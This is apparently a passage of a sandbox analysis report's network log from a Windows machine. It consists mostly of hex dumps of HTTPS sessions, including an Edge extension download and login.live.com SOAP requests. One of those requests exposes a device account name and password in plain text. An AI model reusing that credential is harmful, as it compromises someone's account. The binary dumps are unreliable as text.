                                                                                                                                          2024-04-12 07:15:03 UTC16384INData Raw: 6b cf 89 5e 66 c9 17 fe af cf fe 58 7f 46 22 d9 9f 52 75 fb dc 54 9d f2 45 f6 da ac 96 02 5c f4 ef 18 e5 6e 6e 6e be dc 94 19 f2 c8 dd 24 26 52 55 7e 15 d7 69 ba 35 d9 7f 05 57 f6 b2 25 bf ff 57 fd 7e ab 8b 44 67 66 ac f8 97 af 55 69 5a 0e 26 6b 72 f9 5f e5 4a 15 3a fa 16 c9 39 ff c5 fe 5f 5b 93 e5 2e b7 93 a4 b3 90 c2 6b ad 8a 70 f5 34 6b b8 40 3f ab 6c ff 6b b9 2f c1 49 79 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30
                                                                                                                                          Data Ascii: k^fXF"RuTE\nnn$&RU~i5W%W~DgfUiZ&kr_J:9_[.kp4k@?lk/IyMR\!1Q|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0
                                                                                                                                          2024-04-12 07:15:22 UTC16384INData Raw: e9 13 36 46 7d 25 70 16 a6 ac ad 96 4f 58 d9 5d 99 3c 43 5c ae 51 d2 ce 9a 77 47 49 a9 4c 89 9a e9 a6 c3 96 5c 93 c5 1d 04 3a 52 a2 db 75 ba e8 8c ed ba cf c9 83 cf 2f c1 ab e3 19 e9 5f ea 6c 3a 06 42 6d a9 2b bb 3b 6c e6 11 e2 cc b8 40 0d 66 c4 d6 47 9d 43 48 b6 cf 17 53 19 47 4d 2f 62 63 2e b6 df 26 b7 09 e8 f5 8c 1d c0 e5 f5 0e 81 86 cd d1 7b 9c 8b 16 07 4d 31 65 8e 49 77 c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61
                                                                                                                                          Data Ascii: 6F}%pOX]<C\QwGIL\:Ru/_l:Bm+;l@fGCHSGM/bc.&{M1eIwyfr;Tt5S};PtEr~*uVOLC=A{5__p*tHt|B8peG![Xb!la
                                                                                                                                          2024-04-12 07:15:22 UTC16384INData Raw: 09 a6 b1 a7 f2 21 9f 74 0f b5 05 21 7f e6 9d f1 87 5b c1 b1 b7 bb 64 46 5f 6b 3e 56 70 91 6b 03 79 17 bb 77 52 f9 41 7a 72 cd d3 29 b6 f4 30 ff 74 bf bd 70 6d f5 bb 82 98 24 7c 05 bf f0 26 86 5f 75 44 a2 79 ef 2f 9b a0 22 f6 42 ad 43 9d ea 7a f0 ab 62 b1 c4 6b 28 af a2 bb 60 40 0c f9 6c a9 df 35 c0 77 d7 f0 0b 75 ef b4 4f 20 01 c9 6e d7 8b d6 eb 26 ee 09 6d 06 c3 c0 20 42 f6 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66
                                                                                                                                          Data Ascii: !t![dF_k>VpkywRAzr)0tpm$|&_uDy/"BCzbk(`@l5wuO n&m Bb.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^|sf
                                                                                                                                          2024-04-12 07:15:22 UTC16384INData Raw: d4 ce 64 67 9a c7 a1 38 cf 0b f3 57 18 f3 24 db be 6f 03 a0 d5 34 8c 8b 9e 5c d6 6f 8e 63 b4 f9 f8 32 af 1b 6f 4e 7b bf 39 eb fd e6 bc f7 9b 8b de 6f 2e ff 20 79 9f a4 d2 5f e4 26 50 20 db 05 95 17 3b 79 ef 23 8e fe 61 a0 5f 8a 03 5a f7 44 2d a1 c3 5f 26 90 90 09 18 77 ea a0 62 f3 19 53 9f c9 ea 8f 67 d5 e8 e4 34 eb e6 2c b7 a9 5c 69 a3 75 af d9 ba f6 11 ea 58 64 70 1a 03 5a 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b
                                                                                                                                          Data Ascii: dg8W$o4\oc2oN{9o. y_&P ;y#a_ZD-_&wbSg4,\iuXdpZu\m}v0d'R}g]]OZ&z+gK[|U_dZCN3RaDO9')qG~@/nI,Xr+/N;
                                                                                                                                          2024-04-12 07:15:22 UTC16384INData Raw: 7e c2 44 f6 77 2a 8d cc d2 7b b1 97 07 7d 9b aa 85 cc 82 2b 4b 70 9d 53 75 cc ea ad 8e 38 96 db c4 ca 58 e1 f4 a0 e0 97 6a 75 f4 83 a7 56 56 e5 47 66 01 d0 88 9b 59 b2 9e 99 56 68 99 88 b5 2f e5 e4 83 4b 34 f7 19 95 75 7a 34 b5 33 5b 5f 63 75 86 c3 94 89 3d c7 cc 48 fc 4b c7 02 6c b4 ac 03 81 46 c8 b1 0e c3 45 a4 cf 34 82 9b a9 e1 c3 b1 e1 46 87 99 95 55 9a b4 be 3b 59 b1 6b f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06
                                                                                                                                          Data Ascii: ~Dw*{}+KpSu8XjuVVGfYVh/K4uz43[_cu=HKlFE4FU;YkJj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j
                                                                                                                                          2024-04-12 07:15:22 UTC16384INData Raw: 88 c5 59 08 7e 2c 0e ca 84 df 12 31 b1 38 4e 01 fe c6 f2 af 2f 6f a7 5e ff 0f 71 86 02 5c 4a e4 ef 14 6f f7 2f 70 7c 26 f3 fa c6 c5 01 0c b7 df 31 f9 1b 79 fd 6d d5 1e b6 91 ba 4d 6f c4 e2 d0 88 1b cf 19 e1 5c b5 9e f5 37 3a 4a 54 b0 8c 08 40 04 eb ae 78 fd 3f 38 6a 8d c9 1b 89 67 91 52 ea 51 9c 94 22 1e 7d b0 6a 95 14 85 b6 9f 56 47 3e e9 1b d3 5f a5 ac 50 c3 87 e4 2f 7d 48 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b
                                                                                                                                          Data Ascii: Y~,18N/o^q\Jo/p|&1ymMo\7:JT@x?8jgRQ"}jVG>_P/}HIdqP7J"RUJS<?e3(Z.v4zg9>X#,~0*"1OvD#jK_F(Mu,abs&0`K


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          20192.168.2.549777152.195.19.974436096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:15:04 UTC618OUTGET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1713510890&P2=404&P3=2&P4=YhgVB9LkuWwwCaoX6hAmYrOfdA4yth62Ox%2fL6caRDWHMIx6wArjubY66%2fic%2f7RYLngixARDaWjjjMvWcoRyf8g%3d%3d HTTP/1.1
                                                                                                                                          Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          MS-CV: 4ZbNTCvzlx2U275NQ3skum
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                          2024-04-12 07:15:04 UTC632INHTTP/1.1 200 OK
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Age: 1553339
                                                                                                                                          Cache-Control: public, max-age=17280000
                                                                                                                                          Content-Type: application/x-chrome-extension
                                                                                                                                          Date: Fri, 12 Apr 2024 07:15:04 GMT
                                                                                                                                          Etag: "Gv3jDkaZdFLRHkoq2781zOehQE8="
                                                                                                                                          Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT
                                                                                                                                          MS-CorrelationId: 17ea516a-d3d3-4600-82d1-d0518b7b853a
                                                                                                                                          MS-CV: JwF+IPfc+L+QEx75Ae3BEp.0
                                                                                                                                          MS-RequestId: 6d417d42-df2c-4e77-aff3-e344d27f687f
                                                                                                                                          Server: ECAcc (nyd/D192)
                                                                                                                                          X-AspNet-Version: 4.0.30319
                                                                                                                                          X-AspNetMvc-Version: 5.3
                                                                                                                                          X-Cache: HIT
                                                                                                                                          X-CCC: US
                                                                                                                                          X-CID: 11
                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                          Content-Length: 11185
                                                                                                                                          Connection: close
                                                                                                                                          2024-04-12 07:15:04 UTC11185INData Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20
                                                                                                                                          Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          21192.168.2.54974540.126.24.81443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:15:04 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 3592
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-04-12 07:15:04 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                          2024-04-12 07:15:06 UTC568INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                          Expires: Fri, 12 Apr 2024 07:14:06 GMT
                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                          x-ms-route-info: C555_BL2
                                                                                                                                          x-ms-request-id: 4ea2df33-d150-47e5-8a17-af5e7267fdc7
                                                                                                                                          PPServer: PPV: 30 H: BL02EPF0001D835 V: 0
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          Date: Fri, 12 Apr 2024 07:15:05 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 1276
                                                                                                                                          2024-04-12 07:15:06 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          22192.168.2.54978240.126.24.81443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:15:09 UTC446OUTPOST /ppsecure/deviceaddcredential.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 7642
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-04-12 07:15:09 UTC7642OUTData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 67 61 78 65 64 73 74 67 6e 73 68 6a 6f 6a 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 45 56 45 6b 70 6a 74 3a 70 6d 44 65 6e 6a 79 2b 78 78 70 43 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 76 6e 71 75 73 6b 66 70 70 70 63 69 76 63 3c 2f 4f 6c 64 4d
                                                                                                                                          Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02gaxedstgnshjoj</Membername><Password>EVEkpjt:pmDenjy+xxpC</Password></Authentication><OldMembername>02vnquskfpppcivc</OldM
                                                                                                                                          2024-04-12 07:15:34 UTC542INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Expires: Fri, 12 Apr 2024 07:14:30 GMT
                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                          x-ms-route-info: C542_BL2
                                                                                                                                          x-ms-request-id: cc02dd49-e0b6-470a-a495-8a3a74d8c79a
                                                                                                                                          PPServer: PPV: 30 H: BL02EPF0001D6FA V: 0
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          Date: Fri, 12 Apr 2024 07:15:32 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 17166
                                                                                                                                          2024-04-12 07:15:34 UTC15842INData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 43 30 30 44 39 35 35 32 43 42 30 35 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 32 38 64 65 31 33 39 63 2d 63 61 31 32 2d 34 36 61 62 2d 39 39 31 64 2d 66 37 64 39 39 65 39 31 32 33 37 30 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31
                                                                                                                                          Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>0018C00D9552CB05</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="28de139c-ca12-46ab-991d-f7d99e912370" LicenseID="3252b20c-d425-4711
                                                                                                                                          2024-04-12 07:15:36 UTC1324INData Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66
                                                                                                                                          Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          23192.168.2.54978340.126.24.82443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:15:33 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 3592
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-04-12 07:15:33 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          24192.168.2.54978840.126.24.81443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:15:40 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 3592
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-04-12 07:15:40 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          25192.168.2.54979040.126.24.81443
                                                                                                                                          TimestampBytes transferredDirectionData
